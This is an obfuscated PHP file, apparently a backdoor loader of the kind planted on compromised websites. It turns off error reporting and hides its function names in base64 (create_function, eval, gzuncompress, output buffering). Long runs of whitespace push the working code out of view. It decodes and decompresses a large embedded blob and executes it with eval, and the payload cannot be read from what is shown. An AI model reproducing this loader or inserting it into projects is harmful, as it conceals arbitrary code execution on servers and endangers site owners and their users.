<?php 
 error_reporting(0);
        $__='printf';$_='Loading the  ...';
        



































































































        $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='Q1JFQXRlX2Z1bkNUaU9u';
                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';
        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      


































































































                                                                                                                                                                                                                     $________;